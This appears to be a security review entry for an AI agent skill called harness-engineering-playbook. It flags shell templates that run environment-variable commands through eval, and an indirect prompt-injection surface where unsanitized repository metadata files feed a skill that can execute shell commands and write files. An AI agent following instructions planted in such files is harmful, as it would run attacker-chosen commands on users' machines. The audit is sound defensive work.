The Agent Skills Directory

[COMMAND_EXECUTION]: The Python management script scripts/harness_wizard.py invokes external shell scripts (bootstrap_harness.sh and audit_harness.sh) using subprocess.run() to perform repository initialization and compliance auditing.
[REMOTE_CODE_EXECUTION]: Several shell templates located in assets/templates/scripts/harness/ (including lint.sh, smoke.sh, test.sh, and typecheck.sh) use eval to execute commands provided via environment variables such as HARNESS_LINT_CMD. This mechanism allows for the execution of arbitrary shell commands if the environment variables are populated with malicious content.
[PROMPT_INJECTION]: The skill possesses an indirect prompt injection surface by ingesting and acting upon untrusted data found in the repository it is auditing or bootstrapping.
Ingestion points: The harness scripts read and parse information from project files such as package.json, pyproject.toml, and Cargo.toml to detect language toolchains and existing scripts.
Boundary markers: No boundary markers or "ignore embedded instructions" warnings are used when processing these files.
Capability inventory: The skill has the capability to execute shell commands (via eval and subprocess.run) and write to the filesystem.
Sanitization: The skill does not sanitize or validate the content of the project metadata files before using them to influence execution paths.

harness-engineering-playbook